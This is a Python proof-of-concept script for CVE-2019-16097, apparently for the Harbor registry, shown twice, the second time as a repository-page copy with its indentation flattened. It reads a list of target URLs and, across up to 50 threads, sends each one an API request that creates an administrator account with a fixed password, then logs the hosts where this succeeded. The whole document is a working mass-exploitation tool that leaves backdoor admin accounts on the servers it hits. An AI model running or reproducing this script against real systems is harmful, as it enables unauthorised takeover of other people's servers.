Penetration_Testing_POC/CVE-2019-16097/cve-2019-16097-batch-py3.py

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:rocky
# datetime:2019-09-21 00:43
# software: PyCharm

import requests
import logging
import threading

__author__ = 'rocky'
__date__ = '2019/9/21'


def poc(url):
    bug_url = url + "/api/users"
    payload = '{"username":"test","email":"939555035@qq.com","realname":"test","password":"qq123123","comment":"1","has_admin_role":true}'
    header = {"Content-Type": "application/json", "Accept": "application/json"}
    try:
        r = requests.post(bug_url, data=payload, headers=header, timeout=10)
        print(bug_url)
        print(r.status_code)
        if r.status_code == 201:
            print("[!] This URL is Vulnerable !")
            print("[!] username: test   password: qq123123")

            f.write(
                url +
                "[!] This URL is Vulnerable ! [!] username: test   password: qq123123 "
                + "\n")
        else:
            print("[-] It's nothing.")

    except Exception as e:
        logging.warning(bug_url)
        print(e)


if __name__ == '__main__':
    print("CVE-2019-16097-batch")
    print("author: " + __author__)
    print("date: " + __date__)
    f = open("result.txt", "a")
    url_list = [i.replace("\n", "") for i in open("url.txt", "r").readlines()]
    for url in url_list:
        threading.Thread(target=poc, args=(url, )).start()
        while 1:
            if (len(threading.enumerate()) < 50):
                break
add Harbor remote add admin user 2019-09-25 18:53:16 +08:00			`#!/usr/bin/env python`
			`# -- coding:utf-8 --`
			`# author:rocky`
			`# datetime:2019-09-21 00:43`
			`# software: PyCharm`

			`import requests`
			`import logging`
			`import threading`

			`__author__ = 'rocky'`
			`__date__ = '2019/9/21'`


			`def poc(url):`
			`bug_url = url + "/api/users"`
			`payload = '{"username":"test","email":"939555035@qq.com","realname":"test","password":"qq123123","comment":"1","has_admin_role":true}'`
			`header = {"Content-Type": "application/json", "Accept": "application/json"}`
			`try:`
			`r = requests.post(bug_url, data=payload, headers=header, timeout=10)`
			`print(bug_url)`
			`print(r.status_code)`
			`if r.status_code == 201:`
			`print("[!] This URL is Vulnerable !")`
			`print("[!] username: test password: qq123123")`

			`f.write(`
			`url +`
			`"[!] This URL is Vulnerable ! [!] username: test password: qq123123 "`
			`+ "\n")`
			`else:`
			`print("[-] It's nothing.")`

			`except Exception as e:`
			`logging.warning(bug_url)`
			`print(e)`


			`if __name__ == '__main__':`
			`print("CVE-2019-16097-batch")`
			`print("author: " + __author__)`
			`print("date: " + __date__)`
			`f = open("result.txt", "a")`
			`url_list = [i.replace("\n", "") for i in open("url.txt", "r").readlines()]`
			`for url in url_list:`
			`threading.Thread(target=poc, args=(url, )).start()`
			`while 1:`
			`if (len(threading.enumerate()) < 50):`
			`break`